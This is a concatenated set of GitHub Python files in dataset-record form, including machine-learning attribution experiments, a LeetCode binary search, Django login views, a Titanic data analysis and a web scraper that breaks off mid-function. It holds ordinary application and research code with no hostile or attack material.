class_names\n","repo_name":"RumiaGIT/pytorch-research","sub_path":"modular_scripts/data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36816241545","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom dang.experiment_evaluate import *\nfrom dang.experiment_tab import run_dang, run_norm, run_rand, run_supp, run_cgan\n\nfrom scipy.spatial.distance import pdist\n\n\n\ndef main():\n\n dataset = 'parkinsons'\n\n for dataset in ['wdbc', 'diabetes', 'ctg', 'ionoshpere', 'parkinsons', 'sonar', 'vehicle', 'avila']:\n # for dataset in ['gunpoint', 'italypower', 'arrowhead', 'ecg200', 'phalanges', 'electricdevices']:\n\n method_name = 'norm'\n\n test_size = 100\n train_size = 10\n n_samples = 1000\n nbr_experiments = 100\n\n print(datetime.datetime.now(), 'Dataset: %s' % dataset, method_name)\n D = get_dataset(dataset, path_dataset, normalize=None)\n\n X_train, y_train, X_test, y_test = D['X_train'], D['y_train'], D['X_test'], D['y_test']\n n_classes = D['n_classes']\n\n if len(X_test) > test_size:\n idx = np.random.choice(len(X_test), size=test_size, replace=False)\n X_T = X_test[idx]\n else:\n X_T = X_test\n\n diff_means = list()\n for x in X_T:\n Z_stats, run_time_list = list(), list()\n for i in range(nbr_experiments):\n print(datetime.datetime.now(), '\\tSize: %s' % train_size, method_name)\n\n if len(X_train) > train_size:\n idx = np.random.choice(len(X_train), size=train_size, replace=False)\n X_S = X_train[idx]\n else:\n X_S = X_train\n\n if method_name == 'dang':\n Z, run_train = run_dang(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'rand':\n Z, run_train = run_rand(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'supp':\n Z, run_train = run_supp(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'norm':\n Z, run_train = run_norm(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n elif method_name == 'cgan':\n Z, run_train = run_cgan(X_S, x, n_samples)\n run_time_list.append(run_train)\n\n else:\n raise ValueError('Unknown method %s' % method_name)\n\n Z_stats.append(np.mean(Z, axis=0))\n\n val = pdist(np.array(Z_stats))\n diff_means.append(np.mean(val))\n\n eval_stability = {\n 'stability_mean': float(np.mean(diff_means)),\n 'stability_std': float(np.std(diff_means)),\n 'stability_sum': float(np.sum(diff_means)),\n 'stability_median': float(np.median(diff_means)),\n 'stability_min': float(np.min(diff_means)),\n 'stability_max': float(np.max(diff_means)),\n }\n\n eval_stability['dataset'] = dataset\n eval_stability['method'] = method_name\n eval_stability['n_samples'] = n_samples\n eval_stability['train_size'] = train_size\n eval_stability['test_size'] = test_size\n\n print(datetime.datetime.now(), 'Storing evaluation')\n store_result(eval_stability, 'tabular_neigh_stability')\n # store_result(eval_stability, 'ts_neigh_stability')\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"riccotti/DAG","sub_path":"code/experiment_stability.py","file_name":"experiment_stability.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17598733684","text":"import numpy as np\nimport pandas as pd\nimport logomaker\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\ntf.compat.v1.disable_eager_execution()\nfrom tensorflow import keras\nfrom tensorflow.keras import backend as K\nimport tensorflow.compat.v1.keras.backend as K1\nimport shap\n\n\n\ndef saliency(model, X, class_index=0, layer=-2, batch_size=256):\n saliency = K1.gradients(model.layers[layer].output[:,class_index], model.input)[0]\n sess = K1.get_session()\n\n N = len(X)\n num_batches = int(np.floor(N/batch_size))\n\n attr_score = []\n for i in range(num_batches):\n attr_score.append(sess.run(saliency, {model.inputs[0]: X[i*batch_size:(i+1)*batch_size]}))\n if num_batches*batch_size < N:\n attr_score.append(sess.run(saliency, {model.inputs[0]: X[num_batches*batch_size:N]}))\n\n return np.concatenate(attr_score, axis=0)\n\n\ndef mutagenesis(model, X, class_index=0, layer=-2):\n\n def generate_mutagenesis(X):\n L,A = X.shape \n\n X_mut = []\n for l in range(L):\n for a in range(A):\n X_new = np.copy(X)\n X_new[l,:] = 0\n X_new[l,a] = 1\n X_mut.append(X_new)\n return np.array(X_mut)\n\n N, L, A = X.shape \n intermediate = keras.Model(inputs=model.inputs, outputs=model.layers[layer].output)\n\n attr_score = []\n for x in X:\n\n # get baseline wildtype score\n wt_score = intermediate.predict(np.expand_dims(x, axis=0))[:, class_index]\n\n # generate mutagenized sequences\n x_mut = generate_mutagenesis(x)\n \n # get predictions of mutagenized sequences\n predictions = intermediate.predict(x_mut)[:,class_index]\n\n # reshape mutagenesis predictiosn\n mut_score = np.zeros((L,A))\n k = 0\n for l in range(L):\n for a in range(A):\n mut_score[l,a] = predictions[k]\n k += 1\n \n attr_score.append(mut_score - wt_score)\n return np.array(attr_score)\n\n\ndef deepshap(model, X, class_index=0, layer=-2, num_background=10, reference='shuffle'):\n\n N, L, A = X.shape \n if reference is not 'shuffle':\n num_background = 1\n \n # set of background sequences to take expectation over\n shap_values = []\n for j, x in enumerate(X):\n if np.mod(j, 50) == 0:\n print(\"%d out of %d\"%(j,N))\n if reference == 'shuffle':\n background = []\n for i in range(num_background):\n shuffle = np.random.permutation(L)\n background.append(x[shuffle, :])\n background = np.array(background)\n else: \n background = np.zeros([1,L,A]) \n\n x = np.expand_dims(x, axis=0)\n # calculate SHAPLEY values \n background.shape\n e = shap.DeepExplainer(model, background)\n shap_values.append(e.shap_values(x)[0])\n\n attr_score = np.concatenate(shap_values, axis=0)\n return attr_score\n\n\n \n\ndef integrated_grad(model, X, class_index=0, layer=-2, num_background=10, num_steps=20, reference='shuffle'):\n\n def linear_path_sequences(x, num_background, num_steps, reference):\n def linear_interpolate(x, base, num_steps=20):\n x_interp = np.zeros(tuple([num_steps] +[i for i in x.shape]))\n for s in range(num_steps):\n x_interp[s] = base + (x - base)*(s*1.0/num_steps)\n return x_interp\n\n L, A = x.shape \n seq = []\n for i in range(num_background):\n if reference == 'shuffle':\n shuffle = np.random.permutation(L)\n background = x[shuffle, :]\n else: \n background = np.zeros(x.shape) \n seq.append(linear_interpolate(x, background, num_steps))\n return np.concatenate(seq, axis=0)\n\n # setup op to get gradients from class-specific outputs to inputs\n saliency = K1.gradients(model.layers[layer].output[:,class_index], model.input)[0]\n\n # start session\n sess = K1.get_session()\n\n attr_score = []\n for x in X:\n # generate num_background reference sequences that follow linear path towards x in num_steps\n seq = linear_path_sequences(x, num_background, num_steps, reference)\n \n # average/\"integrate\" the saliencies along path -- average across different references\n attr_score.append([np.mean(sess.run(saliency, {model.inputs[0]: seq}), axis=0)])\n attr_score = np.concatenate(attr_score, axis=0)\n\n return attr_score\n\n\n \ndef attribution_score(model, X, method='saliency', norm='times_input', class_index=0, layer=-2, **kwargs):\n\n N, L, A = X.shape \n if method == 'saliency':\n if 'batch_size' in kwargs:\n batch_size = kwargs['batch_size']\n else:\n batch_size=256\n \n attr_score = saliency(model, X, class_index, layer, batch_size)\n\n \n elif method == 'mutagenesis':\n \n attr_score = mutagenesis(model, X, class_index, layer)\n \n elif method == 'deepshap':\n if 'num_background' in kwargs:\n num_background = kwargs['num_background']\n else:\n num_background = 5\n if 'reference' in kwargs:\n reference = kwargs['reference']\n else:\n reference = 'shuffle'\n \n attr_score = deepshap(model, X, class_index, num_background, reference)\n\n \n elif method == 'integrated_grad':\n if 'num_background' in kwargs:\n num_background = kwargs['num_background']\n else:\n num_background = 10\n if 'num_steps' in kwargs:\n num_steps = kwargs['num_steps']\n else:\n num_steps = 20\n if 'reference' in kwargs:\n reference = kwargs['reference']\n else:\n reference = 'shuffle'\n \n attr_score = integrated_grad(model, X, class_index, layer, num_background, num_steps, reference)\n\n if norm == 'l2norm':\n attr_score = np.sqrt(np.sum(np.squeeze(attr_score)**2, axis=2, keepdims=True) + 1e-10)\n attr_score = X * np.matmul(attr_score, np.ones((1, X.shape[-1])))\n \n elif norm == 'times_input':\n attr_score *= X\n\n return attr_score\n\n\n#-------------------------------------------------------------------------------------------------\n# Plot conv filters\n#-------------------------------------------------------------------------------------------------\n\n\ndef plot_filers(model, x_test, layer=3, threshold=0.5, window=20, num_cols=8, figsize=(30,5)):\n\n intermediate = keras.Model(inputs=model.inputs, outputs=model.layers[layer].output)\n fmap = intermediate.predict(x_test)\n W = activation_pwm(fmap, x_test, threshold=threshold, window=window)\n\n num_filters = len(W)\n num_widths = int(np.ceil(num_filters/num_cols))\n\n fig = plt.figure(figsize=figsize)\n fig.subplots_adjust(hspace=0.1, wspace=0.1)\n\n logos = []\n for n, w in enumerate(W):\n ax = fig.add_subplot(num_widths, num_cols, n+1)\n \n # calculate sequence logo heights\n I = np.log2(4) + np.sum(w * np.log2(w+1e-10), axis=1, keepdims=True)\n logo = np.maximum(I*w, 1e-7)\n\n L, A = w.shape\n counts_df = pd.DataFrame(data=0.0, columns=list('ACGT'), index=list(range(L)))\n for a in range(A):\n for l in range(L):\n counts_df.iloc[l,a] = logo[l,a]\n\n logomaker.Logo(counts_df, ax=ax)\n ax = plt.gca()\n ax.set_ylim(0,2)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.yaxis.set_ticks_position('none')\n ax.xaxis.set_ticks_position('none')\n plt.xticks([])\n plt.yticks([])\n \n logos.append(logo)\n \n return fig, W, logo\n\n\n\ndef activation_pwm(fmap, X, threshold=0.5, window=20):\n\n # extract sequences with aligned activation\n window_left = int(window/2)\n window_right = window - window_left\n\n N,L,A = X.shape\n num_filters = fmap.shape[-1]\n\n W = []\n for filter_index in range(num_filters):\n\n # find regions above threshold\n coords = np.where(fmap[:,:,filter_index] > np.max(fmap[:,:,filter_index])*threshold)\n\n if len(coords) > 1:\n x, y = coords\n\n # sort score\n index = np.argsort(fmap[x,y,filter_index])[::-1]\n data_index = x[index].astype(int)\n pos_index = y[index].astype(int)\n\n # make a sequence alignment centered about each activation (above threshold)\n seq_align = []\n for i in range(len(pos_index)):\n\n # determine position of window about each filter activation\n start_window = pos_index[i] - window_left\n end_window = pos_index[i] + window_right\n\n # check to make sure positions are valid\n if (start_window > 0) & (end_window < L):\n seq = X[data_index[i], start_window:end_window, :]\n seq_align.append(seq)\n\n # calculate position probability matrix\n if len(seq_align) > 1:#try:\n W.append(np.mean(seq_align, axis=0))\n else: \n W.append(np.ones((window,4))/4)\n else:\n W.append(np.ones((window,4))/4)\n\n return np.array(W)\n\n","repo_name":"p-koo/exponential_activations","sub_path":"code/tfomics/explain.py","file_name":"explain.py","file_ext":"py","file_size_in_byte":9285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2920735230","text":"\"\"\"Binary Search\n\nURL: https://leetcode.com/problems/binary-search/\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n @staticmethod\n def search(numbers: List[int], target: int) -> int:\n result = -1\n\n length = len(numbers)\n minimum = 0\n maximum = length\n split_size = None\n\n while split_size is None or split_size > 0:\n split_size = (maximum - minimum) // 2\n position = minimum + split_size\n number = numbers[position]\n\n if target > number:\n minimum += split_size\n elif target < number:\n maximum -= split_size\n else:\n result = position\n break\n\n return result\n\n\ndef test_case_1():\n nums = [-1, 0, 3, 5, 9, 12]\n target = 9\n assert Solution.search(nums, target) == 4\n\n\ndef test_case_2():\n nums = [-1, 0, 3, 5, 9, 12]\n target = 2\n assert Solution.search(nums, target) == -1\n\n\ndef test_case_3():\n nums = [5]\n target = 5\n assert Solution.search(nums, target) == 0\n\n\ndef test_case_4():\n nums = [2, 5]\n target = 5\n assert Solution.search(nums, target) == 1\n","repo_name":"LevZaplatin/problem-solving","sub_path":"leetcode/704-binary-search/test_704_binary_search.py","file_name":"test_704_binary_search.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12498967036","text":"from settings import *\nfrom Voie import *\n\nclass Route(object):\n def __init__(self, axe, coord):\n self.axe = axe # 'x' ou 'y'\n self.coord = coord # Coordonnee de la route sur l'axe perpendiculaire a axe\n self.voies = [Voie(self, coord - m2p(largeurVoie)//2, 0), Voie(self, coord + m2p(largeurVoie)//2, 1)]\n \n def afficher(self):\n for voie in self.voies:\n voie.afficher()\n \n if dessinerLignesContinues:\n stroke(255)\n fill(255)\n if self.axe == 'x':\n rect(width//2, self.coord, width, m2p(largeurLigneContinue)//1)\n else:\n rect(self.coord, height//2, m2p(largeurLigneContinue)//1, height)\n noStroke()\n","repo_name":"FlorianGianni/TIPE","sub_path":"Route.py","file_name":"Route.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4824268004","text":"import queue\n\nq=queue.PriorityQueue()\n#put进入一个元组,元组的第一个元素是优先级(通常是数字,也可以是非数字之间的比较),数字越小优先级越高\nq.put((20,'a'))\nq.put((10,'b'))\nq.put((30,'c'))\n\nprint(q.get())\nprint(q.get())\nprint(q.get())\n'''\n结果(数字越小优先级越高,优先级高的优先出队):\n(10, 'b')\n(20, 'a')\n(30, 'c')\n'''","repo_name":"huotong1212/mylearnpy","sub_path":"code/day11/进程与线程/线程/线程通信/队列/Priority优先级别队列.py","file_name":"Priority优先级别队列.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12601698052","text":"import time\nfrom config import TEST_ACCT_KEY, TEST_NETWORK\nfrom firefly_exchange_client import FireflyClient, Networks, MARKET_SYMBOLS, SOCKET_EVENTS, config_logging\nimport asyncio\nimport logging\n\nconfig_logging(logging, logging.DEBUG)\n\nevent_received = False\n\ndef callback(event):\n global event_received\n print(\"Event data:\", event)\n event_received = True\n\nasync def main():\n client = FireflyClient(True, Networks[TEST_NETWORK], TEST_ACCT_KEY)\n await client.init(True)\n \n def on_error(ws, error):\n print(error)\n \n def on_close(ws):\n # unsubscribe from global events\n status = client.webSocketClient.unsubscribe_global_updates_by_symbol(MARKET_SYMBOLS.ETH)\n print(\"Unsubscribed from global ETH events: {}\".format(status))\n # close socket connection\n print(\"### closed ###\")\n \n def on_open(ws):\n # subscribe to global event updates for ETH market \n status = client.webSocketClient.subscribe_global_updates_by_symbol(MARKET_SYMBOLS.ETH)\n print(\"Subscribed to global ETH events: {}\".format(status))\n\n # SOCKET_EVENTS contains all events that can be listened to\n print(\"Listening to Exchange Health updates\")\n client.webSocketClient.listen(SOCKET_EVENTS.EXCHANGE_HEALTH.value, callback)\n\n \n # logs event name and data for all markets and users that are subscribed.\n # helpful for debugging\n # client.socket.listen(\"default\",callback)\n \n \n print(\"Making socket connection to firefly exchange\")\n client.webSocketClient.initialize_socket(on_open=on_open, on_error=on_error,on_close=on_close)\n \n timeout = 30\n end_time = time.time() + timeout\n while not event_received and time.time() < end_time:\n time.sleep(1)\n\n client.webSocketClient.stop()\n await client.close_connections()\n\nif __name__ == \"__main__\":\n loop = asyncio.new_event_loop()\n loop.run_until_complete(main())\n loop.close()","repo_name":"fireflyprotocol/firefly-client-python","sub_path":"examples/14.web_sockets.py","file_name":"14.web_sockets.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"32631970755","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nDefault input file for combined_workflow\n\nProgram by Charlie Murphy\n'''\n\n# File Names\nmy_electiondatafile = r'C:\\Users\\charl\\Box\\Internships\\Gerry Chain\\States\\Texas\\Combined Level 1\\TX_2020_censusvtds.shp'\nex_dist_name = 'TX_start.csv'\n\n# State Attributes\nstate = 'TX'\npopkey = 'POP19'\ngeotag = 'GEOID20'\nmy_apportionment = 'assignment'\n\n# Chain Attributes\nmarkovchainlength = 1000\npoptol = 0.06\nelectionvol = 0.06\nmax_pop_deviation = 0.0075\n\n# This is the percentage change in the fractional seat share that will be\n# allowed at each step of the Markov Chain. Decreasing this value will decrease\n# the change in partisan outcomes, but will also make the program run slower and\n# possibly reduce the amount of smoothing allowed.\nwin_margin = 0.1\n\n# Smoothing\ncutoff = 100\nmargin = 0.001\n\n# Pool Attributes\npoolsize = 6\ntime_interval = 20","repo_name":"Seesam24601/GerryChain-Population-Balance","sub_path":"combined_input.py","file_name":"combined_input.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74996977012","text":"\"\"\"\nPlatform Users: user-role-save\n\"\"\"\nfrom typing import Optional, Union\n\nfrom bson.objectid import ObjectId # type: ignore\nfrom hopeit.app.api import event_api\nfrom hopeit.app.context import EventContext, PostprocessHook\nfrom hopeit.app.logger import app_extra_logger\n\nfrom app0.admin.db import db\nfrom app0.admin.http import HttpRespInfo\nfrom app0.admin.services import (ACT_USERROLE_DELETE, IDX_USER_ROLE, ROLE_ADMIN)\nfrom app0.admin.services.user_services import save_user_role\nfrom app0.admin.user import UserAppRole\n\nlogger, extra = app_extra_logger()\n\n__steps__ = ['run']\n__api__ = event_api(\n query_args=[\n ('action', Optional[str], \"Apply some action\")\n ],\n payload=(UserAppRole, \"UserRole\"),\n responses={\n 200: (UserAppRole, \"UserRole updated\"),\n 400: (str, \"Request error\"),\n 403: (str, \"Operation forbidden\"),\n 404: (str, \"Object not found\")\n }\n)\n\n\nasync def run(payload: UserAppRole, context: EventContext,\n action: Optional[str] = None) -> Union[UserAppRole, HttpRespInfo]:\n \"\"\"User save & actions\"\"\"\n es = db(context.env)\n # check user admin\n roles = context.auth_info['payload'].get('roles', 'noauth')\n if ROLE_ADMIN not in roles:\n return HttpRespInfo(403, 'User is not Administrator')\n\n if not action:\n await save_user_role(es, payload)\n elif action == ACT_USERROLE_DELETE:\n await _user_role_delete(es, payload, context)\n else:\n return HttpRespInfo(400, 'Action not recognized')\n return payload\n\n\nasync def __postprocess__(payload: Union[UserAppRole, HttpRespInfo], context: EventContext,\n response: PostprocessHook) -> Union[UserAppRole, str]:\n if isinstance(payload, HttpRespInfo):\n response.status = payload.code\n return payload.msg\n return payload\n\n\nasync def _user_role_delete(es, userrole: UserAppRole, context: EventContext):\n # check if user has employee_id & delete\n logger.info(context, f\"Deleting userrole {userrole}\")\n await es[IDX_USER_ROLE].delete_one({'_id': ObjectId(userrole.id)})\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/app0-admin/src/app0/admin/api/user_role_save.py","file_name":"user_role_save.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27494729897","text":"from django.shortcuts import render, redirect\nfrom .forms import LoginForm, CustomUserCreationForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import login, logout\nfrom django.http import JsonResponse\nfrom django.conf import settings\nfrom .music_user_token import get_music_user_token\nimport logging\nlogger = logging.getLogger(__name__)\n\nmain_page_url = 'http://justjam.jppj.jp'\nif settings.DEBUG:\n main_page_url = 'http://localhost:8080/html?env=development'\n\n\ndef user_status(request):\n dict_data = {}\n if request.user.is_authenticated:\n dict_data['authenticated'] = True\n dict_data['username'] = request.user.username\n else:\n dict_data['authenticated'] = False\n dict_data['username'] = 'AnonymousUser'\n logger.info(dict_data)\n return JsonResponse(dict_data, safe=False)\n\n\ndef music_user_token(request):\n dict_data = get_music_user_token()\n return JsonResponse(dict_data, safe=False)\n\n\ndef login_view(request):\n if request.method == 'POST':\n form = LoginForm(request, data=request.POST)\n\n if form.is_valid():\n logger.info('Form input was valid')\n user = form.get_user()\n\n if user:\n login(request, user)\n return redirect(to=main_page_url)\n else:\n logger.error('error happened')\n context = {\n 'form': LoginForm(),\n 'main_page': main_page_url\n }\n return render(request, 'registration/login.html', context)\n else:\n logger.info('Form input was not valid')\n context = {\n 'form': LoginForm(),\n 'main_page': main_page_url,\n 'error_message': 'Your input was not valid. Please try again.'\n }\n return render(request, 'registration/login.html', context)\n\n else:\n context = {\n 'form': LoginForm(),\n 'main_page': main_page_url\n }\n return render(request, 'registration/login.html', context)\n\n\ndef logout_view(request):\n logout(request)\n return redirect(to=main_page_url)\n\n\ndef signup_view(request):\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(to=main_page_url)\n else:\n context = {\n 'form': CustomUserCreationForm(),\n 'error_message': 'Some Error Happened',\n 'main_page': main_page_url\n }\n return render(request, 'registration/signup.html', context)\n\n else:\n context = {'form': CustomUserCreationForm()}\n return render(request, 'registration/signup.html', context)","repo_name":"kttyo/justjam","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32500139322","text":"\"\"\"Filtering.\"\"\"\n\ndef remove_vowels(string: str) -> str:\n \"\"\"\n Remove vowels (a, e, i, o, u).\n\n :param string: Input string\n :return string without vowels.\n \"\"\"\n a = string\n vowels = ('a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U')\n for x in string:\n if x in vowels:\n a = a.replace(x, \"\")\n return a\n\n\ndef longest_filtered_word(string_list: list) -> str:\n \"\"\"\n Filter, find and return the longest string.\n\n :param string_list: List of strings.\n :return: Longest string without vowels.\n \"\"\"\n i = 0\n while i < len(string_list):\n string_list[i] = remove_vowels(string_list[i])\n i += 1\n string_list.sort(key=len, reverse=True)\n return string_list[0]\n\n\ndef sort_list(string_list: list) -> list:\n \"\"\"\n Filter vowels in strings and sort the list by the length.\n\n Longer strings come first.\n\n :param string_list: List of strings that need to be sorted.\n :return: Filtered list of strings sorted by the number of symbols in descending order.\n \"\"\"\n i = 0\n while i < len(string_list):\n string_list[i] = remove_vowels(string_list[i])\n i += 1\n string_list.sort(key=len, reverse=True)\n return string_list","repo_name":"adaresa/BACKEND","sub_path":"Python/TalTech excercises/04/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10429932105","text":"# This is to take the result of running blat of a proposed set of baits against the AMR database.\n# The goal is to calculate which baits are associated with what family so that we can print\n# out AMR family and how many baits will recognize that family. We may decide to enrich some baits\n# in order to deal with the some gene families that we know occur more often in our database.\n\nimport sys\nimport readers\nimport collections\n\nimport ontology_common\n\n\ndef read_fsl(filename):\n groups = readers.read_grouping('grouping.csv', short=True, map_name=True, strip_colon=False)\n bait_to_match = {}\n with open(filename) as f:\n lines = f.readlines()\n skipped_matches = 0\n for line in lines[5:]:\n tokens = line.strip('\\n').split('\\t')\n score = int(tokens[0])\n gene = tokens[9]\n bait = tokens[13]\n if bait in bait_to_match:\n if score > bait_to_match[bait][0]:\n bait_to_match[bait] = (score, gene)\n else:\n bait_to_match[bait] = (score, gene)\n total = collections.defaultdict(int)\n for s, g in bait_to_match.values():\n if g in groups:\n total[groups[g]] += 1\n else:\n total['unknown'] += 1\n return total\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage: bait_topmatch.py file.fsl\")\n sys.exit(-1)\n fsl_file = sys.argv[1]\n total = read_fsl(fsl_file)\n terms = ontology_common.parse_obo('new_combined.obo')\n baits_for_class = collections.defaultdict(int)\n for gene in total.keys():\n for cl in ontology_common.get_class(gene, terms):\n baits_for_class[cl] += total[gene]\n\n total_baits = 0\n for k, v in baits_for_class.items():\n if 'resistance gene' in terms[k]['name'][0]:\n print(terms[k]['name'][0], v)\n total_baits += v\n print(\"Total counts for gene class \", total_baits)\n print()\n total_baits = 0\n for k, v in baits_for_class.items():\n if 'resistance gene' not in terms[k]['name'][0]:\n print(terms[k]['name'][0], v)\n total_baits += v\n print(\"Total counts for mechanism \", total_baits)\n\nif __name__ == '__main__':\n main()\n","repo_name":"raymondr/amr-pipeline-tools","sub_path":"bait_topmatch.py","file_name":"bait_topmatch.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3114901954","text":"'''\nCreated on Sep. 7, 2020\n\n@author: zollen\n'''\n\nimport os\nimport re\nimport pprint\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nimport titanic_kaggle.lib.titanic_lib as tb\nimport seaborn as sb\nfrom matplotlib import pyplot as plt\n\n\npd.set_option('max_columns', None)\npd.set_option('max_rows', None)\npd.set_option('display.width', 1000)\nnp.random.seed(0)\nsb.set_style('whitegrid')\npp = pprint.PrettyPrinter(indent=3) \n\n\nPROJECT_DIR=str(Path(__file__).parent.parent) \ntrain_df = pd.read_csv(os.path.join(PROJECT_DIR, 'data/train.csv'))\ntest_df = pd.read_csv(os.path.join(PROJECT_DIR, 'data/test.csv'))\n\ntrain_df.loc[train_df['Cabin'] == 'T', 'Cabin'] = 'A'\ntrain_df.loc[train_df['Embarked'].isna() == True, 'Embarked'] = 'S'\ntrain_df.loc[train_df['Fare'].isna() == True, 'Fare'] = 7.25\ntest_df.loc[test_df['Cabin'] == 'T', 'Cabin'] = 'A'\ntest_df.loc[test_df['Embarked'].isna() == True, 'Embarked'] = 'S'\ntest_df.loc[test_df['Fare'].isna() == True, 'Fare'] = 7.25\n\n\nlives, deads = tb.calculateFamilyMembers(train_df)\n\ntb.reenigneeringFamilyMembers(train_df, lives, deads)\ntb.reenigneeringFamilyMembers(test_df, lives, deads)\n\ntrain_df['Ticket'] = train_df['Ticket'].apply(tb.captureTicketId)\ntest_df['Ticket'] = test_df['Ticket'].apply(tb.captureTicketId)\n\ntrain_df['Ticket'] = np.log(train_df['Ticket'])\ntest_df['Ticket'] = np.log(test_df['Ticket'])\n\n\nprint(train_df.describe())\n\n \ndf = train_df[['Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Pclass']]\ndf['Sex'] = df['Sex'].map({'male': 0, 'female': 1})\ncorr = df.corr() \nmask = np.triu(np.ones_like(corr, dtype=np.bool)) \nplt.figure(figsize=(14, 10)) \nsb.heatmap(corr, mask=mask, cmap='RdBu_r', annot=True, linewidths=0.5, fmt='0.2f')\nplt.show()\n \n","repo_name":"zollen/Python-ML","sub_path":"titanic_kaggle/third/titanic_analysis.py","file_name":"titanic_analysis.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44052529848","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport urllib\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport random\nimport json\nimport _thread\nimport threading\nimport os\nimport MySQLdb\nimport time\nimport ast\nimport socket\nimport re\n\n\n# 获得数据库连接--------------------------------------------------------------------------------------------------------\ndef getcon():\n # 打开数据库连接\n db = MySQLdb.connect(\"127.0.0.1\", \"root\", \"123456\", \"javatpoint\", charset='utf8')\n return db\n\n\n# 关闭数据库连接\ndef closecon(db):\n db.close()\n\n\n# 数据查询操作\ndef baseselect(sql):\n db = getcon()\n cursor = db.cursor()\n try:\n # 执行SQL语句\n cursor.execute(sql)\n # 获取所有记录列表\n results = cursor.fetchall()\n print('\\033[1;32m' + '+++++sql查询成功!+++++' + '\\033[0m')\n return results\n except Exception as e:\n print(e)\n print('\\033[1;32m' + \"Error: unable to fecth data\" + '\\033[0m')\n\n closecon(db)\n\n\ndef baseoperation(sql):\n db = getcon()\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n print('\\033[1;32m' + '+++++sql执行成功!+++++' + '\\033[0m')\n except Exception as e:\n print(e)\n print('\\033[1;31m' + '-----sql执行失败!-----' + '\\033[0m')\n db.rollback()\n closecon(db)\n\n\n# 避免数据重复记录\ndef sql_repeat(title):\n selectsql = 'SELECT title FROM t_javatpoint_test'\n results = baseselect(selectsql)\n for row in results:\n if title in row:\n return False\n return True\n\n\n# 无内容的单标签------------------------------------------------------------------------------------------------------\ndef tag(string, name):\n string = string.replace('<' + name + '/>', '')\n return string\n\n\n# 无内容的双标签\ndef tags(string, name):\n string = string.replace('', '')\n start = 0\n end = 0\n while string.find('<' + name, end) != -1:\n string = string[:string.find('<' + name, end)] + string[string.find('>', start) + 1:]\n start = string.find('<' + name)\n end = string.find('>')\n # print(string)\n return string\n\n\n# 有内容的单标签\ndef content_tag(string, name):\n pass\n\n\n# 有内容的双标签\ndef content_tags(string, name):\n pass\n\n\n# 去除标签属性,保留标签\ndef remove_attribute(string, name):\n new_string = string\n start = 0\n end = 0\n while string.find('<' + name) != -1:\n string = string[:string.find('<' + name, end)] + string[string.find('>', start):]\n start = string.find('<' + name)\n end = string.find('>')\n new_string = '<' + name + string\n return new_string\n\n\n# 百度翻译模块----------------------------------------------------------------------------------------------------------\ndef translate(word, count):\n url = \"https://fanyi.baidu.com/transapi?from=auto&to=zh&query=\" + word\n # print('开始翻译语句:' + word)\n if count <= 5:\n socket.setdefaulttimeout(5) # 设置全局超时时间\n try:\n # proxy_support = urllib.request.ProxyHandler(getproxyip('proxy_ip_fanyi.txt'))\n # opener = urllib.request.build_opener(proxy_support)\n # opener.addheaders = [getheaders()]\n # urllib.request.install_opener(opener)\n # res = urllib.request.urlopen(url).read()\n headers = {\n 'User-Agent': \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) \"\n \"Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7\",\n 'Accept-Encoding': 'gzip'}\n req = requests.get(url=url, headers=headers)\n html_doc = req.text\n jsons = json.loads(html_doc)\n return 